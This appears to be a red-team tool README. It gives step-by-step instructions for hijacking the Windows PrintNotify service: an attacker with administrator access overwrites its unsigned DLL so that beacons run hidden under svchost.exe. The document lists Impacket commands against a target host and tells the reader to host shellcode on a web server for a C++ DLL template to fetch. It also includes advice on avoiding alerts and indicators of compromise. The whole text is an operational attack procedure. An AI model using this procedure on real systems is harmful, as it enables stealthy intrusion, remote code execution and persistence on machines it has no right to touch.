The PrintNotify Windows service uses unsigned DLLs on most systems. An Administrator-level attacker may overwrite the existing service DLL to execute beacons under svchost.exe without suspicion.
Note that while this approach does result in a clean process tree, it can require starting the RemoteRegistry service which is itself an IOC.
First query the service and ensure it is not already started. Windows does NOT SUPPORT stopping the PrintNotify service.
services.py domain.com/user@10.10.10.10 status -name 'PrintNotify'
You may then choose to confirm the DLL path. However, this will start the Remote Registry service and surely create alerts. Consider simply replacing known DLL paths.
Known default paths:
C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll
DANGEROUS:
reg.py domain.com/user@10.10.10.10 query -key "HKLM\SYSTEM\CurrentControlSet\Services\PrintNotify\Parameters"
- Generate your shellcode and host it on a web server.
- Update the hardcoded URL in the C++ template.
- Compile the service DLL in Visual Studio (use Debug build configuration -> statically linked).
Replace the DLL (be sure to get a backup of the old DLL):
smbclient.py domain.com/user@10.10.10.10
Execute the service:
services.py domain.com/user@10.10.10.10 start -name 'PrintNotify'